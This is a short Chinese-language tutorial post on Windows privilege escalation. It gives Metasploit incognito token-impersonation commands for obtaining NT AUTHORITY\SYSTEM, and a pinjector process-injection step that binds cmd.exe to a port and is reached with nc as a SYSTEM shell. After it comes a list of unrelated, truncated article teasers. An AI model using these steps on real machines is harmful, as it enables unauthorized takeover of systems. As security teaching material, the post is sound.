WIN提权 令牌窃取进程注入

news/2024/11/15 2:36:22/

令牌窃取(鸡肋玩意 2008包括2008以下)

令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。

win7一下的版本可以尝试

这里使用msf上自带的令牌窃取模块

msf反弹shell上线后

查看一下当前权限

use incognito  使用模块list_tokens -u   列出有system的tokenimpersonate_token "NT AUTHORITY\SYSTEM"    获取token

 

 

获取成功

权限为system

 

进程注入(鸡肋玩意2008之前版本。2008都不行)

每个应用程序运行的时候会有进程详细信息

像这个。

进程注入就是利用其他应用进程需要使用的system权限来实现我们想要的操作

下载pininject 软件

然后运行查看你system 的pid

然后 -p  pid  cmd.exe 端口号

然后开个nc会反弹一个cmd窗口

权限是system


http://www.ppmy.cn/news/90455.html

相关文章

计算机操作系统(慕课版)第四章课后题答案

一、简答题 1.什么是临界资源?什么是临界区? 临界资源:以互斥形式访问的资源;临界区:访问临界资源的代码。 2.同步机制应遵循的准则有哪些? 空闲让进;忙则等待;有限等待&#xff1b…

【Leetcode -680.验证回文串Ⅱ -693.交替位二进制数】

Leetcode Leetcode -680.验证回文串ⅡLeetcode -693.交替位二进制数 Leetcode -680.验证回文串Ⅱ 题目:给你一个字符串 s,最多 可以从中删除一个字符。 请你判断 s 是否能成为回文字符串:如果能,返回 true ;否则&…

《Spring Guides系列学习》guide1 - guide5

要想全面快速学习Spring的内容,最好的方法肯定是先去Spring官网去查阅文档,在Spring官网中找到了适合新手了解的官网Guides,一共68篇,打算全部过一遍,能尽量全面的了解Spring框架的每个特性和功能。 开始吧&#xff0…

RecoketMQ管理命令之Topic管理

前置说明: 本文中的所有命令皆是基于当前最新稳定版 Apache RocketMQ 5.1.1 版本;本文中的所有示例命令皆是在基于已正确配置 RocketMQ 的环境变量为前提。 一、创建或修改Topic 使用updateTopic命令可以在指定集群中创建或修改特定的 Topic。 注意&am…

day 5

1.总结变量的类型及含义? 变量类型: 1,自定义变量: 在当前的shell命令行界面设置的变量是局部变量 例: num1 namezhangsan 含义:仅在当前shell生效. 2,环境变量: 全局变量,通过export 导出后的局部变量是全局变量 例: …

Ubuntu下通过.sh文件同时启动多个程序系列2—启动多个终端分别运行不同指令或者程序

Ubuntu下通过.sh文件启动多个终端分别运行不同指令或者程序 说明步骤1.创建.sh文件2.输入内容3.赋予可执行权限4.测试 解释 说明 项目上经常遇到需要到开多个终端分别启动不用程序,这里简单介绍一个方法,通过.sh文件,同时启动多个程序 步骤…

功率信号源的使用方法有哪些

功率信号源是一种常见的电子设备,主要用于产生各种功率信号,例如直流信号、正弦信号等。功率信号源广泛应用于工业、科研、医疗等领域,例如电机驱动、电子仪器仪表、医疗设备等。本文将详细介绍功率信号源的使用方法和注意事项。 图&#xff…

大数据课程-学习二十周总结

4.2.10.hive表中的数据导出 将hive表中的数据导出到其他任意目录,例如linux本地磁盘,例如hdfs,例如mysql等等 4.2.10.1.insert导出 1)将查询的结果导出到本地 insert overwrite local directory ‘/export/data/exporthive’ sel…